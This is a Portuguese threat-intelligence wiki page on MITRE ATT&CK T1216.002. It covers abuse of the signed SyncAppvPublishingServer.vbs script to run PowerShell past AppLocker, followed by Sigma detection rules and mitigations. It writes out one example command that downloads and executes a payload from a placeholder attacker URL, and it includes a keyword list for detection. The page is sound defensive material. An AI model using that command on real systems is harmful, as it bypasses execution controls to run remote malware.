t1216-002-syncappvpublishingserver

# T1216.002 - SyncAppvPublishingServer ## Técnica Pai Sub-técnica de [[t1216-system-script-proxy-execution|T1216 - System Script Proxy Execution]] ## Descrição SyncAppvPublishingServer é uma sub-técnica de execução proxy via script de sistema que abusa do arquivo `SyncAppvPublishingServer.vbs` - um script Visual Basic legítimo, assinado pela Microsoft, associado ao Microsoft Application Virtualization (App-V). O App-V é uma solução de virtualização de aplicações Windows que permite que programas sejam executados como se estivessem instalados localmente, sem instalação tradicional. O script VBS em questão faz parte da infraestrutura de públicação do App-V e é executado regularmente pelo sistema via `wscript.exe` a partir de `%SystemRoot%\System32\`. Adversários abusam deste script legítimo para executar comandos [[t1059-001-powershell|PowerShell]] de forma indireta, contornando restrições de execução e políticas de AppLocker que poderiam bloquear a invocação direta do `powershell.exe`. Como o script é assinado pela Microsoft e faz parte do sistema operacional Windows, sua execução não é bloqueada por controles de allowlisting baseados em assinatura digital. A técnica é uma forma de "living off the land" (LotL) - o adversário usa ferramentas nativas do sistema operacional para executar código malicioso, minimizando a necessidade de introduzir binários externos detectáveis. A técnica ganhou relevância como método de bypass de [[t1059-001-powershell|PowerShell]] Constrained Language Mode e políticas de execução restritivas. Em ambientes onde o AppLocker está configurado para bloquear `powershell.exe` diretamente, a proxy via `SyncAppvPublishingServer.vbs` permite que o adversário execute comandos PowerShell arbitrários com as mesmas permissões do usuário corrente, sem acionar os controles configurados para o executável PowerShell. ## Como Funciona O mecanismo central da técnica reside na forma como o `SyncAppvPublishingServer.vbs` processa seus argumentos de linha de comando. O script foi projetado para receber parâmetros de públicação do App-V, mas aceita um argumento no formato `"n; {comando}"`, onde a parte após o ponto e vírgula é interpretada e executada como código PowerShell. A invocação típica ocorre via: ``` wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; IEX(New-Object Net.WebClient).DownloadString('http://atacante/payload.ps1')" ``` O resultado é que o `wscript.exe` - processo confiável do sistema - instancia um ambiente PowerShell internamente e executa o comando fornecido. Do ponto de vista de monitoramento baseado em processos, o processo pai observado é `wscript.exe` executando um script `.vbs` assinado pela Microsoft, não o `powershell.exe` que seria o alvo de regras de detecção convencionais. Essa cadeia de execução é particularmente eficaz para contornar: (1) políticas de execução PowerShell configuradas via Group Policy, pois o script VBS invoca PowerShell internamente, potencialmente sem aplicar as restrições; (2) regras de AppLocker que bloqueiam `powershell.exe` pelo caminho ou hash; (3) soluções de EDR com detecção baseada em linha de comando do processo `powershell.exe` - o comando malicioso aparece como argumento do `wscript.exe`, não do PowerShell. A combinação com técnicas de ofuscação de comandos PowerShell como [[t1027-obfuscated-files-or-information|T1027]] amplifica ainda mais a evasão. ## Attack Flow ```mermaid graph TB A[Adversário obtém execução de código usuário comum ou privilégio elevado] --> B[Identificação de controles AppLocker bloqueando powershell.exe] B --> C[Uso de SyncAppvPublishingServer.vbs como proxy de execução PowerShell] C --> D[wscript.exe executa VBS assinado comando PS embutido como argumento] D --> E[PowerShell executado internamente sem acionar regras baseadas em processo] E --> F[Download e execução de payload IEX / Invoke-Expression remoto] F --> G[Persistência ou movimento lateral estabelecidos sem detecção de AppLocker] ``` ## Exemplos de Uso Esta sub-técnica é documentada no MITRE ATT&CK sem atribuição pública a um ator de ameaça específico na base de dados oficial, indicando seu uso provável em operações onde a atribuição permanece inconclusiva ou onde as campanhas não foram divulgadas públicamente. No entanto, a técnica integra o repertório de frameworks de ataque amplamente utilizados. **Uso em frameworks de red team** - Ferramentas como [[s0154-cobalt-strike|Cobalt Strike]], [[s0363-empire|Empire]] e scripts de post-exploitation disponíveis no GitHub referênciam `SyncAppvPublishingServer.vbs` como uma das alternativas de bypass de AppLocker em ambientes Windows corporativos. Operadores de red team documentam seu uso em avaliações de ambientes onde políticas restritivas de execução PowerShell são aplicadas. **LOLBins em campanhas de ransomware** - Grupos de ransomware que operam em ambientes Windows corporativos brasileiros e latino-americanos frequentemente empregam técnicas de "living off the land" para contornar controles de segurança de endpoint. Embora o uso específico de `SyncAppvPublishingServer.vbs` não sejá frequentemente atribuído públicamente, a categoria de proxy via scripts legítimos do Windows é característica de operadores como os afiliados ao [[lockbit|LockBit]] e [[blackcat|ALPHV]], que sistematicamente enumeraram e utilizaram LOLBins para evasão em alvos da região. **APTs com foco em ambientes Windows endurecidos** - Grupos de espionagem que operam contra alvos governamentais frequentemente encontram ambientes com AppLocker e restrições de PowerShell. A técnica de proxy via `SyncAppvPublishingServer.vbs` representa uma opção de contingência quando vetores de execução primários são bloqueados. Grupos como [[g0096-apt41|APT41]] documentam uso extensivo de LOLBins em fases de pós-exploração. ## Detecção ```yaml title: Execução de PowerShell via SyncAppvPublishingServer.vbs status: stable logsource: category: process_creation product: windows detection: selection_parent: ParentImage|endswith: \wscript.exe ParentCommandLine|contains: SyncAppvPublishingServer.vbs selection_child: Image|endswith: - \powershell.exe - \pwsh.exe condition: selection_parent and selection_child level: high falsepositives: - Ambientes que utilizam App-V legitimamente com scripts de publicação customizados ``` ```yaml title: Argumento Suspeito em SyncAppvPublishingServer.vbs status: experimental logsource: category: process_creation product: windows detection: selection: Image|endswith: \wscript.exe CommandLine|contains: SyncAppvPublishingServer.vbs filter_legitimate: CommandLine|contains: - -s - publishing suspicious_pattern: CommandLine|contains: - 'IEX' - 'Invoke-Expression' - 'DownloadString' - 'WebClient' - 'EncodedCommand' - 'bypass' condition: selection and suspicious_pattern level: critical falsepositives: - Muito improvável em ambientes de produção ``` ## Mitigação | ID | Mitigação | Descrição | |----|-----------|-----------| | [[m1038-execution-prevention\|M1038]] | Execution Prevention | Configurar AppLocker ou WDAC (Windows Defender Application Control) com regras explícitas que bloqueiem a execução de `SyncAppvPublishingServer.vbs` por usuários não administrativos; ou restringir o uso do App-V em ambientes onde o recurso não é necessário. | | M1026 | Privileged Account Management | Aplicar princípio do menor privilégio; a técnica tem maior impacto quando executada com privilégios elevados - restringir permissões de usuários padrão reduz o raio de ação. | | M1054 | Software Configuration | Desabilitar o App-V e remover os scripts associados (`SyncAppvPublishingServer.vbs`, `SyncAppvPublishingServer.exe`) em sistemas onde a virtualização de aplicações não é utilizada, eliminando o vetor. | ## Contexto Brasil/LATAM A técnica de proxy via scripts de sistema (LOLBins) é amplamente relevante no contexto de segurança brasileira e latino-americana, onde organizações do [[financial|setor financeiro]], [[government|governo]] e infraestrutura crítica frequentemente implementam controles de execução via AppLocker ou Software Restriction Policies sem configuração complementar adequada dos scripts VBS do sistema. Ambientes Windows corporativos no Brasil comumente implementam AppLocker como controle de primeira linha contra execução de scripts e binários não autorizados. No entanto, a configuração padrão do AppLocker que bloqueia `powershell.exe` sem considerar proxies como `SyncAppvPublishingServer.vbs` cria uma lacuna explorada por adversários. Grupos de ransomware com presença ativa no Brasil - como afiliados do [[lockbit|LockBit]] e operadores do [[blackcat|BlackCat]] - documentam em seus playbooks internos o uso de LOLBins para contornar controles de endpoint em ambientes corporativos, tornando este conhecimento acessível a um espectro amplo de atacantes. Recomenda-se que equipes de segurança no Brasil revisem suas políticas de AppLocker para incluir regras explícitas cobrindo scripts VBS do sistema, e que implementem monitoramento comportamental via [[microsoft-sentinel|Microsoft Sentinel]] ou plataformas de EDR com capacidade de detectar cadeias de execução suspeitas envolvendo `wscript.exe` e comandos PowerShell embutidos. O [[sources|CERT.br]] e a [[anatel|Anatel]] públicam alertas periódicos sobre técnicas de LOLBins utilizadas em campanhas contra infraestrutura brasileira. ## Referências - [[t1216-system-script-proxy-execution|T1216 - System Script Proxy Execution]] (técnica pai) - [[t1059-001-powershell|T1059.001 - PowerShell]] (técnica frequentemente combinada) - [[t1027-obfuscated-files-or-information|T1027 - Obfuscated Files or Information]] (técnica complementar) - [[m1038-execution-prevention|M1038 - Execution Prevention]] (mitigação principal) - [[s0154-cobalt-strike|Cobalt Strike]] (framework que referência esta técnica) - [[lockbit|LockBit]] (operadores que utilizam LOLBins em campanhas LATAM) - [[g0096-apt41|APT41]] (ator com uso documentado de LOLBins em ambientes endurecidos) *Fonte: MITRE ATT&CK - T1216.002*